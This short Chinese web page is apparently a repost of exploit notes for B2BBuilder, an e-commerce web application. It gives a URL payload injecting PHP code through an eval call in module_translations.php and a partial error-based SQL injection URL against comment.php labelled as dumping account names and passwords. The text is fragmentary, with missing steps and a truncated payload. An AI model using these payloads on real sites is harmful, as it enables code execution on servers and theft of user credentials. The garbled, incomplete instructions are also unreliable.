1、B2BBuilder头注入后台任意代码执行
构造头部测试:
后台任意代码执行
在eval中用;就能分别执行两个命令,访问:
http://www.0day5.com/admin/module_translations.php?mod=;phpinfo()
2、B2BBuilder 又一注入 漏洞
爆账号:
http://www.0day5.com/comment.php?ctype=2&conid=16873%20and(select%201%20from(select%20count(*),
爆密码:
查看更多关于B2BBuilder头注入后台任意代码执行及注入 - 网站安的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did14773